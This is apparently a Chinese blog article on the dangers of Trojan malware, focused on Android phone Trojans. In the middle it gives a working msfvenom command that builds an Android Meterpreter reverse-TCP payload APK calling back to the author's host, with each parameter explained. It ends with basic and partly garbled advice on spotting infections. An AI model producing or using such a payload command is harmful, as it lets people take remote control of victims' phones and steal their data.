trojan木马危害 trojan木马

木马(Trojan),也称木马病毒,是指通过特定的程序(木马程序)来控制另一台计算机 。木马通常有两个可执行程序:一个是控制端,另一个是被控制端 。木马这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的特洛伊木马本意是特洛伊的,即代指特洛伊木马 , 也就是木马计的故事) 。“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种主机 。木马病毒的产生严重危害着现代网络的安全运行 。
现在智慧手机大行其道,手机木马已经开始流行起来 。一旦手机种了木马 , 个人隐私、以及个人财产都会受到很大威胁 。很多人可能不以为然,以为手机木马并不好做,手机上装个杀软就能防护住了 。其实现在手机木马非常好做,一个完全不懂APK编程的人也能做出手机木马 。我们来简单看一下:
个人电脑装一个Pentestbox绿色软件后,一条命令就可以制作一个手机木马 。
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.17 LPORT=5555 R > E:\apk.apk

trojan木马危害 trojan木马

文章插图
参数说明:
LHOST 你windwos上的IP地址(我的局域网地址是192.168.43.17)
LPORT payload反向连接你主机的端口(这个谁便设置,我设置的5555)
R> 后面跟你木马生成后的输出路径(我是输出到E盘,保存我apk.apk文件)
【trojan木马危害 trojan木马】打开E盘看到apk.apk文件 , 说明手机木马已经制作成功了 。
安卓手机木马制作竟然如此简单 , 哪么我们小白如何来判断自己手机中是否存在了木马呢?其实有一个简单的办法 。我可以给你讲安卓在4.2.2后没有图标的程序是开机启动不了的,而且用户没有点击过的程序也是开机启动不了的 , 谷歌为了安全在4以后的系统用户必须点击一次程序才会让程序收到开机启动的广播 。
所以本着这个原则 , 你手机里突然多了一个陌生的图标,不是自己安装过的APP,千万不要点击 。另一个手机最好无事不要ROOT,哪么恭喜你,你以经手机中木马的机率已经降到99%以下了 。另外的1%,我们还是要相信专业的查杀工具了 。
trojan木马危害 trojan木马

文章插图

    推荐阅读